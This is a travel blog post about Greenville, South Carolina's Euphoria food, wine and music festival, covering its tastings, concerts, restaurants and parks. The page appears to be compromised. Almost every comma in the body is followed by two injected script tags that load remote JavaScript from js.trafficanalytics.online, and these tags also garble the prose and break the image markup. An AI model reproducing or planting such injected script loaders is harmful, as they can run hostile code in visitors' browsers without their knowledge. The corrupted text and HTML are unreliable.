Euphoria Festival’s Southern Charms

by Rosalind Cummings-Yeates, FarsightedFlyGirl

The best way to grab a real sense of a place is through its people, food and music. In Greenville, South Carolina, you’ll get lots of opportunity to experience all of that—Carolinian charm, upcountry cuisine and local country-alt music—during the Euphoria food, wine and music festival. This year, the weekend-long festival runs from September 20 to 23 with a leisurely lineup of tastings and concerts, set against the backdrop of the Blue Ridge Mountains.

Blue Ridge Mountains, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> South Carolina” title=”Blue-Ridge-Mountains-South-Carolina” width=”630″ height=”415″ class=”aligncenter size-medium wp-image-24917″ /></a></p>
<p>As a mid-sized town that used to be known as the textile capital of the South, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> Greenville is an unlikely foodie haven. But innovative chefs, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> artisan farmers and colourful local dishes filled with whole grains and fresh fish have turned Greenville into a secret culinary paradise. </p>
<p>Euphoria’s signature event, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> “Taste of the South, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script>” is a four-hour celebration of the city’s food and music, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> and offers ample evidence for the city’s food lovers’ status. Headquartered in the Peace Center Amphitheater—a performance space that stretches along the Reedy River—“Taste of the South” serves up an array of upcountry specialties, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> such as hominy and mountain trout, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> pork fritters and pouched shrimp and peach salad. </p>
<p>While all the goodies are digesting, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> live music by Greenville native Edwin McCain, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> the alt-country singer-songwriter who co-founded the fest, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> and Shawn Mullins, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> another alt-country musician, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> makes for a magical evening.</p>
<p><a href=Euphoria festival, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> Wyche Pavilion” title=”Euphoria-festival-Wyche-Pavilion” width=”630″ height=”419″ class=”aligncenter size-medium wp-image-24913″ /></a></p>
<p>What I really like about Greenville is that the city is totally walkable and is a nature lover’s dream. A stop by the Saturday Farmer’s Market on downtown Greenville’s Main Street is a must for scooping up local delicacies such as pimento cheese and ground grits to take home. </p>
<p>After catching the “Grand Tasting Showcase, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script>” a mix of wine tasting, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> food sampling and cooking demos, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> you can stroll to Falls Park, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> filled with gardens and a waterfall. If you really need to melt off the calories, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> a hike or bike through Caesar’s Head State Park, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> about 30 miles outside of Greenville, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> will do the trick with close-up views of the Blue Ridge Mountains.</p>
<p><a href=Euphoria festival cook-off, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> South Carolina” width=”247″ height=”372″ /></a></p>
<p>The festival’s Saturday night schedule offers a range of dinners hosted by area restaurants, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> and it’s a great chance to meet locals and learn about their food traditions. My picks are Devereaux, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> a popular spot that supplies tasting menus that include spiced Carolina bison, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> and Stella’s Southern Bistro, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> a local favourite that features a famous pimento cheese plate. If you’re lucky, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> you can get some Greenville natives to explain the complicated cooking techniques for hominy and cheese grits.</p>
<p>The Sunday Jazz Brunch is another Euphoria mainstay; this year’s outdoor feast features a New Orleans-style brunch with crawfish, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> bourbon syrup-drenched waffles and a South Carolina take on gumbo. Live jazz by Mark Rapp and Wycliffe Gordon provide a laidback atmosphere. You can also visit “Art in the Park, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script>” a hub for the local arts scene in Falls Park.</p>
<p>Following the brunch, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> a “Culinary Cook-Off” pits local and guest chefs against one another, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> with live demos, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> but it’s the fest’s finale event, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> “Sunday Supper, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script>” that always draws the most appreciation. A farm-to-table presentation of classic Southern dishes set along the Reedy River and accompanied by live bluegrass music, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'></script> “Sunday Supper” celebrates the Southern tradition of sharing meals with friends and neighbours.</p>
